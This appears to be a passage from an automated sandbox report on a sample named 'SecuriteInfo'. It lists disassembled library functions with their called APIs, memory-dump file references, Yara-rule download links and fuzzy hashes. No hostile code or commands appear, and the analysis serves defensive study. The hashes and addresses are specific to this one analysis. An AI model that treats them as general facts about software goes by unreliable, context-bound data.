                                                                                          • Instruction ID: 525cb48d61e2575c1c9ca9224417ac33443fcebe1e3d2959f3cd126e9a8c5faf
                                                                                          • Opcode Fuzzy Hash: 838fbab041dd06cbda79667aba77fe318cebce9510603c2249bc49099a5d3457
                                                                                          • Instruction Fuzzy Hash: E2417272A05209AFDB10DFA9C980B9AF7F9FF99314F248199E9049B351D736E901CB90
                                                                                          Function 6D0788C9 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6D0788FD
                                                                                          • __isleadbyte_l.LIBCMT ref: 6D078930
                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?), ref: 6D078961
                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?), ref: 6D0789CF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                          • String ID:
                                                                                          • API String ID: 3058430110-0
                                                                                          • Opcode ID: c3a677d86db045a5004665a102ddff479c2e84a24ddacc59f1f81c19e3a9e772
                                                                                          • Instruction ID: 741e69980a1f11759ae15a37d7343fd58d9f953c975198c2e880cb3552b388ef
                                                                                          • Opcode Fuzzy Hash: c3a677d86db045a5004665a102ddff479c2e84a24ddacc59f1f81c19e3a9e772
                                                                                          • Instruction Fuzzy Hash: DA318B31A14286AFEB21CFA8C880BAE3FE5BF02311F158569E1649F190D371D940DB59
                                                                                          Function 6D005A30 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          • std::exception::exception.LIBCMT ref: 6D005ACB
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D005AE0
                                                                                          • std::exception::exception.LIBCMT ref: 6D005B18
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D005B2D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throwstd::exception::exception$_malloc
                                                                                          • String ID:
                                                                                          • API String ID: 3153320871-0
                                                                                          • Opcode ID: 82587a649f3c8842bd3d1c6c1f8c8026d6766ed096a94dd32050cf1a2d926e61
                                                                                          • Instruction ID: 2edabb93b93396d62d5c9e6548e1bdd84aa0c4ba0d389f8bcbfdf1368f4ec0b5
                                                                                          • Opcode Fuzzy Hash: 82587a649f3c8842bd3d1c6c1f8c8026d6766ed096a94dd32050cf1a2d926e61
                                                                                          • Instruction Fuzzy Hash: AB3175B5904609ABEB04DF94D840A9AF7F8FF48750F10826AE91997740EB30AA04CBE1
                                                                                          Function 6D018470 Relevance: 6.1, APIs: 4, Instructions: 91COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          • InitializeCriticalSection.KERNEL32(00000000,00000000,6D015D89,00000000,00000004,00000000,?,00000000,00000000), ref: 6D0184EA
                                                                                          • InitializeCriticalSection.KERNEL32(00000018,?,00000000,00000000), ref: 6D0184F0
                                                                                          • std::exception::exception.LIBCMT ref: 6D01853C
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D018551
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalInitializeSection$Exception@8Throw_mallocstd::exception::exception
                                                                                          • String ID:
                                                                                          • API String ID: 3005353045-0
                                                                                          • Opcode ID: 2fc45c712e0ad29b81cbda5dd0245904f176d6348d30ea957b5255a0fdce5221
                                                                                          • Instruction ID: 1cf74aa56b227612db52f63285656b830e7be2b1b23ff9633961e3139fb562d8
                                                                                          • Opcode Fuzzy Hash: 2fc45c712e0ad29b81cbda5dd0245904f176d6348d30ea957b5255a0fdce5221
                                                                                          • Instruction Fuzzy Hash: 5F314B71A05745AFDB04CFA9C880A9AFBF8FF09210F508A6EE95687B41D770E644CB91
                                                                                          Function 6D02DC40 Relevance: 6.1, APIs: 4, Instructions: 90COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • std::exception::exception.LIBCMT ref: 6D02DCC5
                                                                                            • Part of subcall function 6D069533: std::exception::_Copy_str.LIBCMT ref: 6D06954E
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D02DCDA
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          • std::exception::exception.LIBCMT ref: 6D02DD09
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D02DD1E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaise_mallocstd::exception::_
                                                                                          • String ID:
                                                                                          • API String ID: 399550787-0
                                                                                          • Opcode ID: 19d6ec7ce19a05b455c3642468678d731349a5533eebc8233358fcb8d5f7a373
                                                                                          • Instruction ID: 0c0cfb8d41e623eda4b265aa9770abfe528ea31e5556497c1721e4e28d23c6b1
                                                                                          • Opcode Fuzzy Hash: 19d6ec7ce19a05b455c3642468678d731349a5533eebc8233358fcb8d5f7a373
                                                                                          • Instruction Fuzzy Hash: B53141B5904209AFEB04DF99E844A9EB7F8FF48310F41856DE9199B351E770EA04CBE1
                                                                                          Function 6D072645 Relevance: 6.1, APIs: 4, Instructions: 68COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _malloc.LIBCMT ref: 6D072653
                                                                                            • Part of subcall function 6D069D66: __FF_MSGBANNER.LIBCMT ref: 6D069D7F
                                                                                            • Part of subcall function 6D069D66: __NMSG_WRITE.LIBCMT ref: 6D069D86
                                                                                            • Part of subcall function 6D069D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6D069BD4,6D001290,4E8A916F), ref: 6D069DAB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap_malloc
                                                                                          • String ID:
                                                                                          • API String ID: 501242067-0
                                                                                          • Opcode ID: bea616754558011cfbe180f71ad200f990763be7d6429fd2408ef6c41814c7eb
                                                                                          • Instruction ID: f23880f34a1035b498e268c2c5ccd258078482bdb9b3a0412fe9885e2962cae0
                                                                                          • Opcode Fuzzy Hash: bea616754558011cfbe180f71ad200f990763be7d6429fd2408ef6c41814c7eb
                                                                                          • Instruction Fuzzy Hash: AC11C4328486556BEF321F35A80475E37E9BF46365B22402EEA449F240EB30C94187BC
                                                                                          Function 6D017240 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6D034410: _malloc.LIBCMT ref: 6D03446E
                                                                                          • SafeArrayCreateVector.OLEAUT32(00000011,00000000,?), ref: 6D017287
                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6D01729B
                                                                                          • _memmove.LIBCMT ref: 6D0172AF
                                                                                          • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6D0172B8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$Data$AccessCreateUnaccessVector_malloc_memmove
                                                                                          • String ID:
                                                                                          • API String ID: 583974297-0
                                                                                          • Opcode ID: dbaccd03b899f8b55bb6dc129c0b01ba99bc62999432b1e8a9f5da39077ca0b9
                                                                                          • Instruction ID: 6f0cab7c01c19cbb96ea8e0145f2d3e845453928c1cc360fb898ab91f5954771
                                                                                          • Opcode Fuzzy Hash: dbaccd03b899f8b55bb6dc129c0b01ba99bc62999432b1e8a9f5da39077ca0b9
                                                                                          • Instruction Fuzzy Hash: D6118EB6A04118BBDB10CFE5DC80EDFBB7DABD9654B018269F90497200E770DA058BE0
                                                                                          Function 6D025A70 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D025AB9
                                                                                          • VariantCopy.OLEAUT32(?,6D099C90), ref: 6D025AC1
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D025AE2
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D025AEF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ClearCopyException@8InitThrow
                                                                                          • String ID:
                                                                                          • API String ID: 3826472263-0
                                                                                          • Opcode ID: 1c3a14e3afd228d1bf5b00de9bed6ad9f8945ac7ccf63e6ba21f48cda171046b
                                                                                          • Instruction ID: bbbc56778628335414891b8cf854baf9456d5d8cf3f3b86e65f8fb7c249c8379
                                                                                          • Opcode Fuzzy Hash: 1c3a14e3afd228d1bf5b00de9bed6ad9f8945ac7ccf63e6ba21f48cda171046b
                                                                                          • Instruction Fuzzy Hash: 7511D672905569BFDF00DF98C8C5BEFBBB8FB46624F11412AE924A3340C774990087E5
                                                                                          Function 6D038D80 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _malloc.LIBCMT ref: 6D038D8A
                                                                                            • Part of subcall function 6D069D66: __FF_MSGBANNER.LIBCMT ref: 6D069D7F
                                                                                            • Part of subcall function 6D069D66: __NMSG_WRITE.LIBCMT ref: 6D069D86
                                                                                            • Part of subcall function 6D069D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6D069BD4,6D001290,4E8A916F), ref: 6D069DAB
                                                                                            • Part of subcall function 6D0691F6: std::_Lockit::_Lockit.LIBCPMT ref: 6D069202
                                                                                          • _malloc.LIBCMT ref: 6D038DAF
                                                                                          • std::exception::exception.LIBCMT ref: 6D038DD4
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D038DEB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: _malloc$AllocateException@8HeapLockitLockit::_Throwstd::_std::exception::exception
                                                                                          • String ID:
                                                                                          • API String ID: 3043633502-0
                                                                                          • Opcode ID: 3a43a0dc92aedb10928d23431925c4c8a5d203c52d017c923fe8253cc0952c42
                                                                                          • Instruction ID: e637a7703aaf9a5de797abe4908753d355278c0791975d8491e28d373138217c
                                                                                          • Opcode Fuzzy Hash: 3a43a0dc92aedb10928d23431925c4c8a5d203c52d017c923fe8253cc0952c42
                                                                                          • Instruction Fuzzy Hash: 9AF0F0728082662BF200EB95AC41BAF77E89F95720F42092CEA5493241F720D208C2B3
                                                                                          Function 6D070A60 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                          • String ID:
                                                                                          • API String ID: 3016257755-0
                                                                                          • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                          • Instruction ID: bec6e00d61bd187ad63c4d5bb49f7292e53f7dbcd09a913a7bcac9ea49151a13
                                                                                          • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                          • Instruction Fuzzy Hash: CC117E7280814ABBEF224E85DC11EEE3F72BB19354F498614FE2859030C337C5B1AB89
                                                                                          Function 6D068970 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 175COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: _memmove_memset
                                                                                          • String ID: EncodingParameters
                                                                                          • API String ID: 3555123492-55378216
                                                                                          • Opcode ID: edca9054faada542001a271f72ad968ac5eea621fe75193842b1294697ac5e2c
                                                                                          • Instruction ID: 03c083481b5a47421eafc68941babcb51d1567ce4b92c5764ef21b30ba6ebfd6
                                                                                          • Opcode Fuzzy Hash: edca9054faada542001a271f72ad968ac5eea621fe75193842b1294697ac5e2c
                                                                                          • Instruction Fuzzy Hash: 8261E0B46083419FD304CF69C880A2AFBE9AFC9754F148A1DF59987391D7B0E945CBA2
                                                                                          Function 6D00F190 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6D004760: __CxxThrowException@8.LIBCMT ref: 6D0047F9
                                                                                            • Part of subcall function 6D038D80: _malloc.LIBCMT ref: 6D038D8A
                                                                                            • Part of subcall function 6D038D80: _malloc.LIBCMT ref: 6D038DAF
                                                                                          • _memcpy_s.LIBCMT ref: 6D00F282
                                                                                          • _memset.LIBCMT ref: 6D00F293
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: _malloc$Exception@8Throw_memcpy_s_memset
                                                                                          • String ID: @
                                                                                          • API String ID: 3081897325-2766056989
                                                                                          • Opcode ID: e74a569ed8bc8cdb0acafafa51956ac2fd3349bea3418fb0166990c2e00ae6b6
                                                                                          • Instruction ID: 2cde7cb9242af88733eb3c4eb201e473fa7ce668e2a241f8ec51b93612af3eae
                                                                                          • Opcode Fuzzy Hash: e74a569ed8bc8cdb0acafafa51956ac2fd3349bea3418fb0166990c2e00ae6b6
                                                                                          • Instruction Fuzzy Hash: E4519F70D08249EFEB10CFA4D940BDEBBB4BF55304F108198D94967381DB716A49CFA2
                                                                                          Function 6D036920 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 128COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D036A34
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throw
                                                                                          • String ID: : this object does't support a special last block$tm
                                                                                          • API String ID: 2005118841-806234092
